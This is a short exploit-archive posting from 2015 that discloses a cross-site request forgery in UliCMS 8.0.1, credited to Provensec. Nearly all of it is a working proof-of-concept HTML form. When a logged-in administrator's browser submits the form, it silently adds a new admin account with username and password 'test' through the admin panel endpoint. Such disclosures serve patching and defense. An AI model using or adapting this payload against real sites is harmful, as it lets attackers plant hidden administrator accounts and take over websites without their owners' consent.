Home / exploits UliCMS 8.0.1 Cross Site Request Forgery
Posted on 18 March 2015
# Affected software: UliCMS 8.0.1 # Type of vulnerability: admin add exploit (csrf) # URL: http://en.ulicms.de/ # Discovered by: Provensec # Website: http://www.provensec.com #version 8.0.1 # Proof of concept <html> <body> <form action=" http://demo.opensourcecms.com/ulicms/admin/index.php?action=admins" method="POST"> <input type="hidden" name="add_admin" value="add_admin" /> <input type="hidden" name="admin_username" value="test" /> <input type="hidden" name="admin_lastname" value="test" /> <input type="hidden" name="admin_firstname" value="test" /> <input type="hidden" name="admin_email" value="test" /> <input type="hidden" name="admin_password" value="test" /> <input type="submit" value="Submit request" /> </form> </body> </html>
